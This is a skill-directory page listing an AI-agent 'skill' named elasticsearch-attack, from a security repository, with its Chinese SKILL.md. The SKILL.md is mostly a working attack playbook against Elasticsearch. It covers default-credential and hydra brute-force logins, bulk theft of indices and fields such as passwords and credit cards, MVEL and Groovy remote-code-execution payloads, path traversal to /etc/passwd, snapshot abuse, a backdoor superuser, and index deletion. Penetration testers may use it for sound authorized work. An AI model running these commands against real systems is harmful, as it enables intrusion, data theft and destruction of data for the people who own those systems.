تشغيل أي مهارة في Manus بنقرة واحدة

elasticsearch-attack

النجوم١٬٤٩٣

التفرعات٢٢٩

آخر تحديث٢١ مايو ٢٠٢٦ في ٠٨:٣٨

Elasticsearch 未授权访问与利用。当发现目标开放 9200/9300 端口、Elasticsearch 服务无认证、需要从 ES 获取索引数据或实现远程命令执行时使用。覆盖未授权访问、认证绕过、索引数据窃取、MVEL/Groovy 脚本 RCE（旧版本）、快照仓库滥用、集群信息泄露、动态脚本注入、Ingest Pipeline 滥用、路径穿越

التثبيت

التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.

تشغيل في Manus

المصدر

wgpsec

wgpsec/AboutSecurity

فتح مستودع GitHub عرض مستودعات المنشئ

تنزيل

تشغيل في Manus

المهن ذات الصلةSOC

استنادا إلى تصنيف SOC المهني

محللو أمن المعلوماتمهن الحاسوب والرياضيات·SOC 15-1212

مستكشف الملفات

2 ملفات

SKILL.md

readonly

المزيد من هذا المستودع

نفس المستودع

azure-pentesting

wgpsec/AboutSecurity

Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产（Blob Storage/App Service/Azure VM/Azure Functions）、获取 Azure 凭据（Service Principal/Managed Identity/Access Token）、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面

2026-06-211.5k

gcp-exploit

wgpsec/AboutSecurity

GCP 云环境攻击方法论。当目标使用 Google Cloud Platform、发现 GCP Service Account/Metadata/Storage Bucket 时使用。覆盖 Metadata 服务利用、Service Account 密钥窃取、IAM 提权、GKE 逃逸、Storage Bucket 枚举

2026-05-211.5k

gcp-pentesting

wgpsec/AboutSecurity

GCP 云环境渗透测试总体方法论。当目标使用 Google Cloud Platform、发现 GCP 相关资产（GCS Bucket/Compute Engine/Cloud Functions/GKE）、获取 GCP 凭据（Service Account Key/OAuth Token/Metadata Token）、或需要对 GCP 环境进行安全评估时使用。提供从未授权枚举到提权、后渗透、GCP-to-Workspace 穿越的全流程决策树。覆盖 37+ GCP 服务攻击面

2026-05-211.5k

serverless-attack

wgpsec/AboutSecurity

Serverless/云函数安全测试与攻击。当目标涉及 AWS Lambda、腾讯云 SCF、阿里云 FC、Azure Functions 等 Serverless 服务时使用。当发现 API Gateway 后端是 Lambda/SCF 触发、通过 cloud-aksk-exploit 获取到函数操作权限、或需要分析云函数代码中的漏洞时使用。覆盖事件注入（HTTP/OSS/消息队列触发器参数篡改）、环境变量泄露（硬编码凭据提取）、函数代码注入/覆盖（UpdateFunctionCode）、Runtime 利用（/tmp 写入/Layer 劫持/依赖投毒）、临时凭据滥用。发现任何 Lambda/SCF/云函数、API Gateway、或 Serverless 架构时都应使用此 skill

2026-05-211.5k

tencent-pentesting

wgpsec/AboutSecurity

腾讯云渗透测试方法论。当目标使用腾讯云服务、发现 cos.*.myqcloud.com 资产、获取腾讯云 SecretId/SecretKey、在 CVM 实例内可访问 metadata.tencentyun.com 元数据、或需要对腾讯云 CAM/CVM/COS/TencentDB/TKE/SCF 等服务进行安全评估时使用。覆盖 CAM 提权、CVM 接管、COS 对象存储利用、TencentDB 数据库攻击、TKE 容器集群、SCF 云函数、CLB 负载均衡、CLS 日志服务、KMS 密钥管理

2026-05-211.5k

java-injection-audit

wgpsec/AboutSecurity

Java 源码注入类漏洞审计。当在 Java 白盒审计中需要检测注入类漏洞时触发。覆盖 6 种注入: SQL 注入(JDBC/MyBatis/Hibernate/JPA)、命令注入(Runtime.exec/ProcessBuilder)、 SSRF(HttpURLConnection/OkHttp/RestTemplate)、LDAP 注入、SpEL/OGNL 表达式注入、NoSQL 注入(MongoDB)。需要 java-audit-pipeline 提供的数据流证据(EVID_*)作为审计输入。

2026-05-211.5k

name	elasticsearch-attack
description	Elasticsearch 未授权访问与利用。当发现目标开放 9200/9300 端口、Elasticsearch 服务无认证、需要从 ES 获取索引数据或实现远程命令执行时使用。覆盖未授权访问、认证绕过、索引数据窃取、MVEL/Groovy 脚本 RCE（旧版本）、快照仓库滥用、集群信息泄露、动态脚本注入、Ingest Pipeline 滥用、路径穿越
metadata	{"tags":"elasticsearch,es,9200,9300,未授权,rce,groovy,mvel,snapshot,ingest-pipeline,kibana,索引","category":"exploit"}

Elasticsearch 未授权访问与利用

Elasticsearch 默认监听 9200 端口且无认证保护，暴露在网络上时面临大量敏感数据泄露和潜在的 RCE 风险。

⛔ 深入参考（必读）

完整利用命令和 payload → 读 references/attack-techniques.md

Phase 1: 服务发现与版本识别

1.1 基础探测

# 直接请求根路径，返回集群名称和版本号
curl http://TARGET:9200/

# 集群健康状态
curl http://TARGET:9200/_cat/health?v
curl http://TARGET:9200/_cluster/health?pretty

1.2 Nmap 扫描

# HTTP 服务识别
nmap -sV -p 9200,9300 TARGET

# 通用 HTTP 指纹脚本；ES 细节枚举优先使用后续 curl API
nmap -p 9200 --script http-title,http-headers TARGET

关键判断：

返回 JSON 含 cluster_name / version.number → 无认证，直接进入 Phase 3
返回 401 / 403 → 有认证，进入 Phase 2
version.number < 1.2 → MVEL RCE 可用（CVE-2014-3120）
version.number 1.3.x - 1.4.x → Groovy 沙箱逃逸 RCE 可用（CVE-2015-1427）
version.number >= 5.x → 关注 Painless 脚本和 Ingest Pipeline

Phase 2: 未授权/认证绕过检测

2.1 无认证确认

# 直接访问核心 API 端点
curl http://TARGET:9200/_cat/indices?v
curl http://TARGET:9200/_cluster/state?pretty
curl http://TARGET:9200/_nodes/stats?pretty

2.2 默认凭证与 X-Pack

# 常见默认凭证: elastic:changeme, elastic:elastic, admin:admin
curl -u elastic:changeme http://TARGET:9200/
curl -u elastic:elastic http://TARGET:9200/
curl -u admin:admin http://TARGET:9200/

# 检查 X-Pack Security 是否启用
curl http://TARGET:9200/_xpack/security/user
curl http://TARGET:9200/_security/user

# 暴力破解
hydra -L users.txt -P passwords.txt TARGET http-get /_search

Phase 3: 攻击决策树

连接成功？
├─ ES < 1.2 → MVEL RCE (/_search + script filter, CVE-2014-3120)
├─ ES 1.3.x-1.4.x → Groovy 沙箱逃逸 RCE (CVE-2015-1427)
├─ ES < 1.4.3 + _plugin → 路径穿越读文件
├─ ES >= 6.x + 无认证 → 索引数据批量导出
│   ├─ _cat/indices 列出所有索引
│   ├─ _search + _scroll 批量导出
│   └─ 搜索敏感字段 (password, token, email, credit_card)
├─ 有快照仓库权限 → 快照数据窃取/恢复
├─ 有 Ingest Pipeline 权限 → Pipeline 注入（数据修改）
├─ 有动态脚本权限 → 脚本存储与执行
├─ Kibana 暴露 → Kibana 控制台利用
└─ 有集群管理权限 → 配置篡改 / 恶意用户创建

前置信息收集：

# 获取版本号（决定攻击路径）
curl -s http://TARGET:9200/ | grep number

# 列出所有索引（判断数据规模）
curl http://TARGET:9200/_cat/indices?v

# 获取集群设置
curl http://TARGET:9200/_cluster/settings?pretty

# 获取所有索引映射（了解数据结构）
curl http://TARGET:9200/_all/_mapping?pretty

Phase 4: 数据窃取速查

4.1 索引枚举

# 列出所有索引
curl http://TARGET:9200/_cat/indices?v

# 列出所有别名
curl http://TARGET:9200/_aliases?pretty

# 获取索引映射（字段结构）
curl http://TARGET:9200/INDEX_NAME/_mapping?pretty

4.2 数据搜索与导出

# 搜索所有数据（默认返回 10 条）
curl -X POST http://TARGET:9200/_search?pretty \
  -H 'Content-Type: application/json' -d '{
    "query": {"match_all": {}},
    "size": 1000
  }'

# 搜索敏感字段
curl -X POST http://TARGET:9200/_search?pretty \
  -H 'Content-Type: application/json' -d '{
    "query": {
      "multi_match": {
        "query": "password",
        "fields": ["*"]
      }
    }
  }'

4.3 大量数据用 _scroll API

# 初始化 scroll
curl -X POST http://TARGET:9200/INDEX_NAME/_search?scroll=5m \
  -H 'Content-Type: application/json' -d '{
    "query": {"match_all": {}},
    "size": 5000
  }'

# 持续获取（使用上一步返回的 _scroll_id）
curl -X POST http://TARGET:9200/_search/scroll \
  -H 'Content-Type: application/json' -d '{
    "scroll": "5m",
    "scroll_id": "SCROLL_ID_HERE"
  }'

→ 读 references/attack-techniques.md 获取 elasticdump 批量导出命令

Phase 5: RCE 速查

5.1 MVEL 表达式注入 (ES < 1.2, CVE-2014-3120)

curl -X POST http://TARGET:9200/_search?pretty \
  -H 'Content-Type: application/json' -d '{
    "query": {
      "filtered": {
        "query": {"match_all": {}},
        "filter": {
          "script": {
            "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getMethod(\"exec\",java.lang.Class.forName(\"java.lang.String\")).invoke(null,\"id\")"
          }
        }
      }
    }
  }'

5.2 Groovy 沙箱逃逸 (ES 1.3.x-1.4.x, CVE-2015-1427)

curl -X POST http://TARGET:9200/_search?pretty \
  -H 'Content-Type: application/json' -d '{
    "query": {
      "filtered": {
        "filter": {
          "script": {
            "script": "def proc = \"id\".execute(); proc.waitFor(); proc.text()"
          }
        }
      }
    }
  }'

5.3 路径穿越 (ES < 1.4.3)

curl http://TARGET:9200/_plugin/head/../../../../../../etc/passwd
curl http://TARGET:9200/_plugin/head/../../../../../../etc/elasticsearch/elasticsearch.yml

→ 读 references/attack-techniques.md 获取完整 RCE payload

Phase 6: 其他攻击向量

6.1 快照仓库滥用

# 注册快照仓库
curl -X PUT http://TARGET:9200/_snapshot/exfil_repo \
  -H 'Content-Type: application/json' -d '{
    "type": "fs",
    "settings": {"location": "/tmp/snapshots"}
  }'

# 创建快照
curl -X PUT http://TARGET:9200/_snapshot/exfil_repo/snap_1

# 恢复快照到攻击者可达路径
curl -X POST http://TARGET:9200/_snapshot/exfil_repo/snap_1/_restore

6.2 Ingest Pipeline 注入

# 列出现有 Pipeline
curl http://TARGET:9200/_ingest/pipeline?pretty

# 创建恶意 Pipeline
curl -X PUT http://TARGET:9200/_ingest/pipeline/malicious \
  -H 'Content-Type: application/json' -d '{
    "description": "data interceptor",
    "processors": [
      {"set": {"field": "intercepted", "value": "true"}}
    ]
  }'

6.3 集群配置篡改

# 创建后门用户（需 X-Pack 管理权限）
curl -X POST http://TARGET:9200/_xpack/security/user/attacker \
  -H 'Content-Type: application/json' -d '{
    "password": "password123",
    "roles": ["superuser"]
  }'

# 删除索引
curl -X DELETE http://TARGET:9200/INDEX_NAME

→ 读 references/attack-techniques.md 获取完整技术细节

工具速查

工具	用途
curl	ES REST API 交互（所有操作的基础）
elasticsearch-head	集群管理 Web UI 插件
Kibana	ES 数据可视化和 Dev Tools 查询
elasticdump	索引数据批量导出/导入
nmap	端口扫描、服务识别和通用 HTTP 指纹脚本
hydra	HTTP 认证暴力破解

注意事项

ES 操作全部通过 REST API（HTTP），所有命令使用 curl
_scroll API 对大量数据导出比 _search 更高效，避免一次性拉取全部数据
旧版本 RCE：MVEL 在 ES < 1.2 有效，Groovy 沙箱逃逸在 ES 1.3.x-1.4.x 有效，现代版本已移除
_search?size=10000 有上限限制，超过需使用 _scroll 或 search_after
删除索引 (DELETE /index) 不可逆，操作前确认目标
生产环境避免对大索引执行 match_all 全量查询，优先分批导出